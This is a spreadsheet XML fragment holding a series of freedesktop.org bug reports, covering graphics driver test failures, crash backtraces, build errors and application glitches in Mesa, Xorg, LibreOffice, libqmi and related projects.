  <si>
    <t>Created attachment 119647
dmesg
Igt test gem_pwrite_snooped is fail with last setup
setup:
======
Hardware:
Platform: Braswell M 
CPU : Intel(R) Celeron N3060 1.60GHz @ 1.6 GHz (family: 6 model: 76 stepping: 4)
SoC : BSW C0
QDF : K6XC
CRB : BRASWELL RVP Fab2
Mandatory Reworks : All Feature Reworks: F28 F32 F33 F35 F37
Optional reworks : O-01a O-02 O-03 
Software:
Linux distribution: Ubuntu 15.04 LTS 64 bits 
BIOS : BRAS.X64.B084.R00.1508310642
TXE FW : 2.0.0.2073
Ksc : 1.08
kernel  drm-intel-nightly
Commit a3b0dec82fdb59c629c4fb9847245b80b0cf69dd
Author: Jani Nikula 
Date:   Fri Nov 6 14:48:23 2015 +0200
drm-intel-nightly: 2015y-11m-06d-12h-48m-02s UTC integration manifest
cairo: (HEAD tag: 1.14.2) 93422b3cb5e0ef8104b8194c8873124ce2f5ea2d from git://git.freedesktop.org/git/cairo
drm: (HEAD tag: libdrm-2.4.65 tag: 2.4.65) c3496167637e35cf8a52d5e7e53a412e79d80db0 from git://git.freedesktop.org/git/mesa/drm
intel-driver: (HEAD tag: 1.6.1 origin/v1.6-branch) 35858c69166b845c59ca32e19a3dbb0b758df209 from git://git.freedesktop.org/git/vaapi/intel-driver
libva: (HEAD tag: libva-1.6.1 origin/v1.6-branch) 613eb962b45fbbd1526d751e88e0d8897af6c0e0 from git://git.freedesktop.org/git/vaapi/libva
mesa: (HEAD tag: mesa-11.0.4) 31bf24703193cc23961923e01548b1acb2760a93 from git://git.freedesktop.org/git/mesa/mesa
xf86-video-intel: (HEAD tag: 2.99.917) baec802b21387d04aebb10ac29e719a1800c5aa0 from git://git.freedesktop.org/git/xorg/driver/xf86-video-intel
xserver: (HEAD tag: xorg-server-1.17.2) 2123f7682d522619f101b05fb75efa75dabbe371 from git://git.freedesktop.org/git/xorg/xserver
* Tools *
intel-gpu-tools: (HEAD origin/master origin/HEAD master) bfea74a9f64a900bcb90f946b38746781017449f from git://git.freedesktop.org/git/xorg/app/intel-gpu-tools
Reproducing steps:
==================
./gem_pwrite_snooped
Actual result:
==============
IGT-Version: 1.12-gbfea74a (x86_64) (Linux: 4.3.0-nightly+ x86_64)
Test assertion failure function test file gem_pwrite_snooped.c:125:
Failed assertion: memchr_inv(buf 0xff object_size) == NULL
Stack trace:
  #0 [__igt_fail_assert+0x101]
  #1 [main+0x308]
  #2 [__libc_start_main+0xf0]
  #3 [_start+0x29]
  #4 [+0x29]
Test gem_pwrite_snooped failed.
**** DEBUG ****
(gem_pwrite_snooped:1052) igt-core-DEBUG: Test requirement passed: !igt_run_in_simulation()
Test requirement passed: fd &gt;= 0
Test requirement passed: ret == 0
Test requirement passed: ret == 0
Test assertion failure function test file gem_pwrite_snooped.c:125:
Failed assertion: memchr_inv(buf 0xff object_size) == NULL
****  END  ****
FAIL (0.004s)</t>
  </si>
  <si>
    <t>ACCOUNTSSERVICE-35872</t>
  </si>
  <si>
    <t>gnome session crashes while removing the system user</t>
  </si>
  <si>
    <t>accountsservice 0.6.6
gdm[12099]: ******************* START **********************************
gdm[12099]: [Thread debugging using libthread_db enabled]
gdm[12099]: [New Thread 0xb71bbb70 (LWP 11717)]
gdm[12099]: 0xb77cd424 in __kernel_vsyscall ()
gdm[12099]: #0  0xb77cd424 in __kernel_vsyscall ()
gdm[12099]: #1  0xb77377bb in waitpid () from /lib/libpthread.so.0
gdm[12099]: #2  0x08054c21 in ?? ()
gdm[12099]: #3  0x08054d09 in ?? ()
gdm[12099]: #4  
gdm[12099]: #5  0xb77cd424 in __kernel_vsyscall ()
gdm[12099]: #6  0xb74c6bbf in raise () from /lib/libc.so.6
gdm[12099]: #7  0xb74c8545 in abort () from /lib/libc.so.6
gdm[12099]: #8  0xb7658a67 in g_logv () from /usr/lib/libglib-2.0.so.0
gdm[12099]: #9  0xb7658aa2 in g_log () from /usr/lib/libglib-2.0.so.0
gdm[12099]: #10 0xb7658c9d in g_return_if_fail_warning () from /usr/lib/libglib-2.0.so.0
gdm[12099]: #11 0xb76f11bd in g_object_ref () from /usr/lib/libgobject-2.0.so.0
gdm[12099]: #12 0xb7606cf4 in remove_user (manager=0x981a018 user=0x0) at act-user-manager.c:728
gdm[12099]: #13 0xb7607121 in on_user_removed_in_accounts_service (proxy=0x9818960 object_path=0x982bfb0 /org/freedesktop/Accounts/User0 user_data=0x981a018) at act-user-manager.c:844
gdm[12099]: #14 0xb770c878 in g_cclosure_marshal_VOID__BOXED () from /usr/lib/libgobject-2.0.so.0
gdm[12099]: #15 0xb77912d4 in ?? () from /usr/lib/libdbus-glib-1.so.2
gdm[12099]: #16 0xb76efb02 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
gdm[12099]: #17 0xb7702a20 in ?? () from /usr/lib/libgobject-2.0.so.0
gdm[12099]: #18 0xb770b486 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
gdm[12099]: #19 0xb770b632 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
gdm[12099]: #20 0xb7791f0d in ?? () from /usr/lib/libdbus-glib-1.so.2
gdm[12099]: #21 0xb7753cd3 in dbus_connection_dispatch () from /usr/lib/libdbus-1.so.3
gdm[12099]: #22 0xb7789fcd in ?? () from /usr/lib/libdbus-glib-1.so.2
gdm[12099]: #23 0xb764f712 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
gdm[12099]: #24 0xb764fef0 in ?? () from /usr/lib/libglib-2.0.so.0
gdm[12099]: #25 0xb76505b3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
gdm[12099]: #26 0x0804bdae in ?? ()
gdm[12099]: #27 0xb74b2103 in __libc_start_main () from /lib/libc.so.6
gdm[12099]: #28 0x0804b951 in ?? ()
gdm[12099]: 
gdm[12099]: Thread 2 (Thread 0xb71bbb70 (LWP 11717)):
gdm[12099]: #0  0xb77cd424 in __kernel_vsyscall ()
gdm[12099]: No symbol table info available.
gdm[12099]: #1  0xb773681b in read () from /lib/libpthread.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: #2  0xb765160d in ?? () from /usr/lib/libglib-2.0.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: .0
gdm[12099]: No symbol table info available.
gdm[12099]: #4  0xb772fc77 in start_thread () from /lib/libpthread.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: #5  0xb7568c6e in clone () from /lib/libc.so.6
gdm[12099]: No symbol table info available.
gdm[12099]: 
gdm[12099]: Thread 1 (Thread 0xb74166c0 (LWP 11677)):
gdm[12099]: b77cd424 in __kernel_vsyscall ()
gdm[12099]: No symbol table info available.
gdm[12099]: #1  0xb77377bb in waitpid () from /lib/libpthread.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: #2  0x08054c21 in ?? ()
gdm[12099]: No symbol table info available.
gdm[12099]: #3  0x08054d09 in ?? ()
gdm[12099]: ailable.
gdm[12099]: #4  
gdm[12099]: No symbol table info available.
gdm[12099]: #5  0xb77cd424 in __kernel_vsyscall ()
gdm[12099]: No symbol table info available.
gdm[12099]: #6  0xb74c6bbf in raise () from /lib/libc.so.6
gdm[12099]: No symbol table info available.
gdm[12099]: /libc.so.6
gdm[12099]: No symbol table info available.
gdm[12099]: #8  0xb7658a67 in g_logv () from /usr/lib/libglib-2.0.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: #9  0xb7658aa2 in g_log () from /usr/lib/libglib-2.0.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: ail_warning () from /usr/lib/libglib-2.0.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: #11 0xb76f11bd in g_object_ref () from /usr/lib/libgobject-2.0.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: er.c:728
gdm[12099]: No locals.
gdm[12099]: #13 0xb7607121 in on_user_removed_in_accounts_service (proxy=0x9818960 object_path=0x982bfb0 /org/freedesktop/Accounts/User0 user_data=0x981a018) at act-user-manager.c:844
gdm[12099]:         manager = 0x981a018
gdm[12099]:         user = 0x0
gdm[12099]: 78 in g_cclosure_marshal_VOID__BOXED () from /usr/lib/libgobject-2.0.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: #15 0xb77912d4 in ?? () from /usr/lib/libdbus-glib-1.so.2
gdm[12099]: No symbol table info available.
gdm[12099]: ect-2.0.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: #17 0xb7702a20 in ?? () from /usr/lib/libgobject-2.0.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: #18 0xb770b486 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: 32 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: #20 0xb7791f0d in ?? () from /usr/lib/libdbus-glib-1.so.2
gdm[12099]: No symbol table info available.
gdm[12099]: #21 0xb7753cd3 in dbus_connection_dispatch () from /usr/lib/libdbus-1.so.3
gdm[12099]: o symbol table info available.
gdm[12099]: #22 0xb7789fcd in ?? () from /usr/lib/libdbus-glib-1.so.2
gdm[12099]: No symbol table info available.
gdm[12099]: #23 0xb764f712 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: om /usr/lib/libglib-2.0.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: #25 0xb76505b3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
gdm[12099]: No symbol table info available.
gdm[12099]: #26 0x0804bdae in ?? ()
gdm[12099]: No symbol table info available.
gdm[12099]:  from /lib/libc.so.6
gdm[12099]: No symbol table info available.
gdm[12099]: #28 0x0804b951 in ?? ()
gdm[12099]: No symbol table info available.
gdm[12099]: A debugging session is active.
gdm[12099]: 
gdm[12099]: 	Inferior 1 [process 11677] will be detached.
gdm[12099]: 
gdm[12099]: Quit anyway? (y or n) [answered Y input not from terminal]</t>
  </si>
  <si>
    <t>biru.ionut</t>
  </si>
  <si>
    <t>MESA-31568</t>
  </si>
  <si>
    <t>[r300g] SIGSEGV src/mesa/vbo/vbo_exec_array.c:1154</t>
  </si>
  <si>
    <t>mesa: d18df9e336b5d2e68a4a6185f7b9d0d0c095c3c4 (master)
chipset: RV530 71C5 (ATI Radeon X1600)
system architecture: i686
libdrm-dev: 2.4.21-1ubuntu2.1
kernel version: 2.6.35-22-generic
Linux distribution: Ubuntu 10.10 i386
Machine model: iMac41
Run piglit bgra-sec-color-pointer test.
$ ./bin/bgra-sec-color-pointer-test
...
Segmentation fault (core dumped)
(gdb) bt
#0  0x0183d923 in vbo_exec_MultiDrawElements (mode=3 count=0x1401 type=4 indices=0x804f1d0 primcount=143224880) at src/mesa/vbo/vbo_exec_array.c:1154
#1  0x0804a622 in piglit_display () at piglit/tests/general/bgra-sec-color-pointer.c:82
#2  0x0804c847 in display () at piglit/tests/util/piglit-framework.c:52
#3  0x00755820 in fghRedrawWindow (window=0x88a2060 enumerator=0xbfd29688) at freeglut_main.c:210
#4  fghcbDisplayWindow (window=0x88a2060 enumerator=0xbfd29688) at freeglut_main.c:227
#5  0x00759660 in fgEnumWindows (enumCallback=0x755790  enumerator=0xbfd29688) at freeglut_structure.c:394
#6  0x00755cdb in fghDisplayAll () at freeglut_main.c:249
#7  glutMainLoopEvent () at freeglut_main.c:1450
#8  0x00756605 in glutMainLoop () at freeglut_main.c:1498
#9  0x0804c9f0 in main (argc=1 argv=0xbfd29914) at piglit/tests/util/piglit-framework.c:118
(gdb) frame 0
#0  0x0183d923 in vbo_exec_MultiDrawElements (mode=3 count=0x1401 type=4 indices=0x804f1d0 primcount=143224880) at src/mesa/vbo/vbo_exec_array.c:1154
1154	      if (!_mesa_validate_DrawElements(ctx mode count[i] type indices[i]
(gdb) l
1149	   GLint i
1150	
1151	   ASSERT_OUTSIDE_BEGIN_END_AND_FLUSH(ctx)
1152	
1153	   for (i = 0 i &lt; primcount i++) {
1154	      if (!_mesa_validate_DrawElements(ctx mode count[i] type indices[i]
1155					       0))
1156		 return
1157	   }
1158</t>
  </si>
  <si>
    <t>POPPLER-103469</t>
  </si>
  <si>
    <t>Unable to open PDF File - Couldn't find trailer dictionary</t>
  </si>
  <si>
    <t>Created attachment 135069
corrupt pdf file
Hello
  I have a program that takes an input PDF ads text at three coordinates and outputs it back to a new PDF file. I can successfully do this to a number of PDFs. I have however one very simple PDF file that once edited cannot be read by evince (pdfinfo pdftocairo and friends as well) but can by every other PDF reader I've tried.</t>
  </si>
  <si>
    <t>nathanael</t>
  </si>
  <si>
    <t>XORG-1539</t>
  </si>
  <si>
    <t>Changing system time changes X timestamp</t>
  </si>
  <si>
    <t>After changing system time (e.g. going 5 months back and then going back to the 
current date triggers it in my case) the X timestamp is changed as well. This 
triggers e.g. KDE bug #90795 (http://bugs.kde.org/show_bug.cgi?id=90795). The 
best description of the timestamp I've found in the glossary of the protocol 
specification is a bit vague but I think changing system time should not affect X 
timestamp. The X timestamp is no real time and is used only to ensure ordering. 
Changing it when system time changes can e.g. make recent timestamps to become 
suddenly very old timestamp thus breaking various things.</t>
  </si>
  <si>
    <t>TELEPATHY-35140</t>
  </si>
  <si>
    <t>Add missoncontrolpath variable to mission-control-plugins.pc</t>
  </si>
  <si>
    <t>This is for testing so plugins can lookup where the mission control
executable is.</t>
  </si>
  <si>
    <t>XORG-97490</t>
  </si>
  <si>
    <t>latest xf86-video-ati from git doesn't compile (probably xserver too old)</t>
  </si>
  <si>
    <t>error message:
  CC     radeon_kms.lo
radeon_kms.c: In function 'RADEONBlockHandler_KMS':
radeon_kms.c:845:17: error: 'struct _Screen' has no member named 'isGPU'
     if (!pScreen-&gt;isGPU) {
                 ^
make[2]: *** [radeon_kms.lo] Fehler 1
xserver:
X.Org X Server 1.11.3
Release Date: 2011-12-16</t>
  </si>
  <si>
    <t>joro-2013</t>
  </si>
  <si>
    <t>LIBREOFFICE-57682</t>
  </si>
  <si>
    <t>Bundled English spelling extension has unknown status in newest daily build (2012-11-28)</t>
  </si>
  <si>
    <t>Created attachment 70785
Bundled English spelling extension has unknown status LOdev daily build 2012-11-28 on Mac OS X
I donâ€™t know if this a severe problem or just a glitch but anyway I need to report it:
In the newest daily master build for Mac OS X i. LOdev 4.0.0.0.alpha1+
(Build ID: 519c947f213ec69b0c92d3ea76193270644263e
pull time: 2012-11-28 04:07:39)
the â€œExtension Managerâ€ window says that our bundled â€œEnglish spelling dictionaries hyphenation rules thesaurus and grammar checkerâ€œ extension has â€œunknownâ€ status. See the attached screenshot.
This problem was NOT present in the previous daily build I have tested i.e.
LOdev 4.0.0.0.alpha1+ (Build ID: 6aabe09ac092c51d4b394bde9c7ea0055b952e3 pull time: 2012-11-26 00:28:52).
So: a regression?!
Removing/renaming the LOdev user profile does NOT change the situation: the extension still has the â€œunknownâ€ status. I have not installed any other extensions at all. It does not change the situation if I install the the US English language Pack or not.
Tested on Mac OS X 10.6.8 (Intel).</t>
  </si>
  <si>
    <t>HAL-19944</t>
  </si>
  <si>
    <t>hal-info for iriver T7 player</t>
  </si>
  <si>
    <t>Created attachment 22563
hal-info for iriver T7 player
Attachment is a patch to root/fdi/information/10freedesktop/10-usb-music-players.fdi
My .is_audio_player file is:
audio_folders=Music/Recordings/
folder_depth=2
output_formats=application/oggaudio/mpegaudio/x-ms-wma
input_formats=audio/x-ms-wma
playlist_format=audio/x-iriver-pla
playlist_path=Playlists/%File</t>
  </si>
  <si>
    <t>POPPLER-105772</t>
  </si>
  <si>
    <t>arthur backend</t>
  </si>
  <si>
    <t>[PATCH] Arthur support for Type3 fonts</t>
  </si>
  <si>
    <t>Created attachment 138383
Patch that prevents 'startPage' to fill the page with white color
I implemented type3 font support in the Arthur backend loosely following what the Cairo backend does.  It's a prototype and needs more testing but unfortunately I have only a few documents with type3 fonts.
I'll upload two patches:
1) The first removes code that made the startPage method fill the page with white color.  It is unclear why this code existed at all.  For type3 fonts it is problematic because then glyphs can have a white background rather than a transparent one.
2) The actual implementation.  It is as short as I could make it but the result is not as pretty as could be.  For example there are now two separate caches for type3 fonts and other fonts.  I think the best would be to introduce an abstract ArthurFont base class and an ArthurFontEngine.cc file similar to what the Cairo backend does.  I'll promise to provide this as a separate cleanup patch once the type3 support has been merged.</t>
  </si>
  <si>
    <t>MESA-36965</t>
  </si>
  <si>
    <t>GL_EXT_texture_sRGB (included in OpenGL 2.1) is broken (glean/texture_srgb broken too)</t>
  </si>
  <si>
    <t>The GL extension GL_EXT_texture_sRGB (which is in OpenGL 2.1 core) defines the texture formats GL_SRGB and friends and specifies that sampling such a texture automatically converts the values from non-linear RGB (sRGB) to linear RGB.
However this conversion is not performed the textures are sampled as if they were normal GL_RGB textures. This results in wrong colors (e.g. in the Bino 3D video player: far too bright).
I'm running Ubuntu 11.04 on x86_64 and get the following version info from GL:
OpenGL version: 2.1 Mesa 7.10.2
OpenGL renderer: Gallium 0.4 on AMD RV710
OpenGL vendor: X.Org
If you need more information please let me know.
[This is the same as bug 32323 but re-reported for newer Mesa versions]</t>
  </si>
  <si>
    <t>marlam</t>
  </si>
  <si>
    <t>LIBQMI-59664</t>
  </si>
  <si>
    <t>segfault in qmicli -d /dev/cdc-wdm2 --nas-get-system-info</t>
  </si>
  <si>
    <t>I am playing with libqmi and got a segfault:
{{{
bliss:/tmp# gdb qmicli
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as x86_64-linux-gnu.
For bug reporting instructions please see:
...
Reading symbols from /usr/bin/qmicli...Reading symbols from /usr/lib/debug/.build-id/24/a16d5ae2add04c47c4e68258b5e88d75ffdac7.debug...done.
done.
(gdb) r -d /dev/cdc-wdm2 --nas-get-system-info
Starting program: /usr/bin/qmicli -d /dev/cdc-wdm2 --nas-get-system-info
[Thread debugging using libthread_db enabled]
Using host libthread_db library /lib/x86_64-linux-gnu/libthread_db.so.1.
[New Thread 0x7ffff59b1700 (LWP 23028)]
[/dev/cdc-wdm2] Successfully got system info:
	GSM service:
		Status: 'none'
		True Status: 'none'
		Preferred data path: 'no'
	WCDMA service:
		Status: 'available'
		True Status: 'available'
		Preferred data path: 'no'
		Domain: 'cs-ps'
		Service capability: 'cs-ps'
		Roaming status: 'off'
		Forbidden: 'no'
		Location Area Code: '1234'
		Cell ID: '12345'
		MCC: '123'
Program received signal SIGSEGV Segmentation fault.
0x00007ffff6ef8e21 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0  0x00007ffff6ef8e21 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x00007ffff6ee098e in fputs () from /lib/x86_64-linux-gnu/libc.so.6
#2  0x00007ffff7593baf in g_print () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#3  0x0000000000419668 in get_system_info_ready (client= res=) at qmicli-nas.c:1394
#4  0x00007ffff7afa537 in g_simple_async_result_complete () from /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#5  0x00007ffff72836c0 in get_system_info_ready (device= res= simple=0x63bea0) at qmi-nas.c:55078
#6  0x00007ffff7afa537 in g_simple_async_result_complete () from /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#7  0x00007ffff7afa639 in ?? () from /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#8  0x00007ffff758c355 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#9  0x00007ffff758c688 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#10 0x00007ffff758ca82 in g_main_loop_run () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#11 0x00000000004107e3 in main (argc=1 argv=0x7fffffffec48) at qmicli.c:527
(gdb)
(gdb) up
#1  0x00007ffff6ee098e in fputs () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) up
#2  0x00007ffff7593baf in g_print () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
(gdb) up
#3  0x0000000000419668 in get_system_info_ready (client= res=) at qmicli-nas.c:1394
1394	                        g_print (\t\tMNC: '%.3s'\n mnc)
(gdb) p mnc
$1 = (const gchar *) 0x643134 01\377
(gdb) p mnc[0]
$2 = 48 '0'
(gdb) p mnc[1]
$3 = 49 '1'
(gdb) p mnc[2]
$4 = -1 '\377' 
}}}
Related Code:
{{{
                if (network_id_valid) {
                    g_print (\t\tMCC: '%s'\n mcc)
                    if (mnc[2] == 0xFF)
                        g_print (\t\tMNC: '%.2s'\n mnc)
                    else
                        g_print (\t\tMNC: '%.3s'\n mnc)
                }
}}}
In theory this should be fine as one is only printing two chars but I am not sure if g_print will actually still read till the end of the (null-terminated) string. Might just want to print 2/3 %c's instead.
Changing it to:
{{{
                if (network_id_valid) {
                    if (mnc[2] == 0xFF)
                        g_print (\t\tMNC: '%c%c'\n mnc[0] mnc[1])
                    else
                        g_print (\t\tMNC: '%c%c%c'\n mnc[0] mnc[1] mnc[2])
                }
}}}
Results in:
{{{
(gdb) r -d /dev/cdc-wdm2 --nas-get-system-info
Starting program: /tmp/pkg-libqmi/cli/.libs/qmicli -d /dev/cdc-wdm2 --nas-get-system-info
[Thread debugging using libthread_db enabled]
Using host libthread_db library /lib/x86_64-linux-gnu/libthread_db.so.1.
[New Thread 0x7ffff59b1700 (LWP 28575)]
[/dev/cdc-wdm2] Successfully got system info:
	GSM service:
		Status: 'none'
		True Status: 'none'
		Preferred data path: 'no'
	WCDMA service:
		Status: 'available'
		True Status: 'available'
		Preferred data path: 'no'
		Domain: 'cs-ps'
		Service capability: 'cs-ps'
		Roaming status: 'off'
		Forbidden: 'no'
		Location Area Code: '1234'
		Cell ID: '12345'
		MCC: '123'
		MNC: '12?'
		HS call status: 'hsdpa-hsupa-unsupported'
		HS service: 'hsdpa-hsupa-unsupported'
		Cell broadcast support: 'off'
		Call barring status (CS): 'unknown'
		Call barring status (PS): 'unknown'
		Cipher Domain: 'none'
	LTE service:
		Status: 'none'
		True Status: 'none'
		Preferred data path: 'no'
[Thread 0x7ffff7fea7a0 (LWP 28572) exited]
[Inferior 1 (process 28572) exited normally]
}}}</t>
  </si>
  <si>
    <t>LIBREOFFICE-45276</t>
  </si>
  <si>
    <t>imported xlsx pivot table with group field as data field show ### for numbers</t>
  </si>
  <si>
    <t>test document ( will be attached ) will show a simple pivot table with simple group field used as a row &amp; data field data shown is just garbage ####</t>
  </si>
  <si>
    <t>DRI-25611</t>
  </si>
  <si>
    <t>[i830] Error: i915 EDID invalid</t>
  </si>
  <si>
    <t>running gentoo with recent gentoo-kernel 2.6.32-gentoo fails with 
i915 0000:00:02.0: VGA-1: EDID invalid.
[drm] DAC-6: set mode 800x600 14
[drm:edid_is_valid] *ERROR* Raw EDID:
ff ff ff ff ff ff ff 00 09 d1 d4 76 95 23 00 00  ...........v.#..
07 10 01 03 6c 26 1e 78 ea c5 c6 a3 57 4a 9c 23  ....l&amp;.x....WJ.#
12 4f 54 bd ef 80 71 4f 81 90 81 80 81 8c 01 01  .OT...qO........
01 01 01 01 01 01 30 2a 00 98 51 00 2a 40 30 70  ......0*..Q.*@0p
13 00 78 2d 11 00 00 1e d5 09 80 a0 20 5e 63 10  ..x-........ ^c.
10 60 52 08 78 2d 11 00 00 1a 00 00 00 fd 00 38  .`R.x-.........8
4c 1f 53 0e 00 0a 20 20 20 20 20 20 00 00 00 fc  L.S...      ....
00 42 65 6e 51 20 46 50 39 33 47 58 0a 20 00 d2  .BenQ FP93GX. ..
with 2.6.31 no errors appears
these errors came with the git-versions of 2.6.32
so i have no screen from console or from xorg
in console-mode (ALT + STRG + F1-F6) my TFT shows Out Of Range
xorg (ALT + STRG + F7) shows nothing
but i have ssh...</t>
  </si>
  <si>
    <t>XORG-29846</t>
  </si>
  <si>
    <t>NV4B startx results in black screen</t>
  </si>
  <si>
    <t>Created attachment 38230
dmesg of nouveau module load and startx
My NV4b card starts X but it results in a black screen.
I see a bunch of errors continually like:
[drm:drm_edid_block_valid] *ERROR* Raw EDID:
...
nouveau 0000:03:00.0: TV-1: EDID block 0 invalid.
[drm] nouveau 0000:03:00.0: DDC responded but no EDID for TV-1
I am connecting the card to a vga display via a dvi+vga converter.  
I tried disabling tv out by using tv_disable=1 at the command line but that doesn't seem to help.
This card has actually started X fine in the past and this is the same monitor I used before.
I am running the latest nouveau-linux-2.6 kernel (764e0885f987171030368a3f20993cd2855c4e40).</t>
  </si>
  <si>
    <t>XORG-22005</t>
  </si>
  <si>
    <t>Desktop background showing through application after notification clears</t>
  </si>
  <si>
    <t>Created attachment 26308
screenshot of the problem.
I'm not sure what specifically causes the problem it seems to only happen from raised notifications. (I'm not actually sure this is a problem with intel drivers)... only started happening with qt-4.5 which supposedly intel has some bugs with (or vice versa?)</t>
  </si>
  <si>
    <t>WAYLAND-104279</t>
  </si>
  <si>
    <t>evdev-mt-touchpad.c:1270]: (warning) Identical condition</t>
  </si>
  <si>
    <t>../src/evdev-mt-touchpad.c:1264] -&gt; [../src/evdev-mt-touchpad.c:1270]: (warning) Identical condition 'tp-&gt;nfingers_down!=tp-&gt;old_nfingers_down' second condition is always false
Source code is
    if (tp-&gt;nfingers_down != tp-&gt;old_nfingers_down)
        return true
    /* if we're transitioning between slots and fake touches in either
     * direction we may get a coordinate jump
     */
    if (tp-&gt;nfingers_down != tp-&gt;old_nfingers_down &amp;&amp;</t>
  </si>
  <si>
    <t>LIBREOFFICE-34896</t>
  </si>
  <si>
    <t>Color palette: number of columns</t>
  </si>
  <si>
    <t>Options - Colours. Colours are OK. It have 8 columns:
http://ubuntuone.com/p/aFh/
Font and other colours selector. Colours are not OK because it have 10 columns and colours are messed up. Now the colour palette is made to work with 8 columns.
http://ubuntuone.com/p/aFj/
Both should have same number columns then it's possible to make colour palette that fits.</t>
  </si>
  <si>
    <t>liivhillar</t>
  </si>
  <si>
    <t>DRI-107725</t>
  </si>
  <si>
    <t>[CI][DRMTIP] igt@kms_ccs@pipe-[abc]-crc-* - fail - Failed assertion: !mismatch</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_95/fi-icl-u/igt@kms_ccs@pipe-b-crc-sprite-planes-basic.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_95/fi-icl-u/igt@kms_ccs@pipe-a-crc-sprite-planes-basic.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_95/fi-icl-u/igt@kms_ccs@pipe-a-crc-primary-rotation-180.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_95/fi-icl-u/igt@kms_ccs@pipe-a-crc-primary-basic.html
(kms_ccs:1425) igt_debugfs-CRITICAL: Test assertion failure function igt_assert_crc_equal file ../lib/igt_debugfs.c:370:
(kms_ccs:1425) igt_debugfs-CRITICAL: Failed assertion: !mismatch
Subtest pipe-A-crc-primary-basic failed.</t>
  </si>
  <si>
    <t>DBUS-93069</t>
  </si>
  <si>
    <t>clean up compiler warnings from gcc 5.2</t>
  </si>
  <si>
    <t>XORG-23195</t>
  </si>
  <si>
    <t>[945GM] tv-out is not detected by xrandr</t>
  </si>
  <si>
    <t>Created attachment 28420
Xorg.0.log
Hi
I'm using
x11-driver-video-intel-2.8.0
Tv-output is not detected at all by any component of the system.
I attach xrandr --verbose output my xorg.conf and my Xorg.0.log</t>
  </si>
  <si>
    <t>MESA-24162</t>
  </si>
  <si>
    <t>[llvmpipe] crashes with llvm 2.6</t>
  </si>
  <si>
    <t>mesa: c19482b16f164ce1b6625d18950a4644e5834373 (master)
llvm-dev: 2.6~svn20090918-0ubuntu1
Run glxinfo.
Program received signal SIGABRT Aborted.
0x007bb422 in __kernel_vsyscall ()
(gdb) bt
#0  0x007bb422 in __kernel_vsyscall ()
#1  0x005fe4d1 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0x00601932 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0x00d4edd6 in lp_jit_screen_init (screen=0x805bdd0) at src/gallium/drivers/llvmpipe/lp_jit.c:157
#4  0x00d26058 in llvmpipe_create_screen (winsys=0x805bdb0) at src/gallium/drivers/llvmpipe/lp_screen.c:235
#5  0x00b72488 in xlib_create_llvmpipe_screen () at src/gallium/winsys/xlib/xlib_llvmpipe.c:410
#6  0x00b74c4c in XMesaCreateContext (v=DWARF-2 expression error: DW_OP_reg operations must be used either alone or in conjuction with DW_OP_piece.
) at src/gallium/state_trackers/glx/xlib/xm_api.c:765
#7  0x00b77e08 in glXCreateContext (dpy=DWARF-2 expression error: DW_OP_reg operations must be used either alone or in conjuction with DW_OP_piece.
) at src/gallium/state_trackers/glx/xlib/glx_api.c:1062
#8  0x0804ab10 in ?? ()
#9  0x005eab56 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
#10 0x08048e21 in ?? ()
src/gallium/drivers/llvmpipe/lp_jit.c
   145  void
   146  lp_jit_screen_init(struct llvmpipe_screen *screen)
   147  {
   148     char *error = NULL
   149  
   150     screen-&gt;module = LLVMModuleCreateWithName(llvmpipe)
   151  
   152     screen-&gt;provider = LLVMCreateModuleProviderForExistingModule(screen-&gt;module)
   153  
   154     if (LLVMCreateJITCompiler(&amp;screen-&gt;engine screen-&gt;provider 1 &amp;error)) {
   155        _debug_printf(%s\n error)
   156        LLVMDisposeMessage(error)
-&gt; 157        abort()
   158     }
   159  
   160     screen-&gt;target = LLVMGetExecutionEngineTargetData(screen-&gt;engine)
   161  
   162     screen-&gt;pass = LLVMCreateFunctionPassManager(screen-&gt;provider)
   163     LLVMAddTargetData(screen-&gt;target screen-&gt;pass)
   164     /* These are the passes currently listed in llvm-c/Transform/Scalar.h
   165      * but there are more on SVN. */
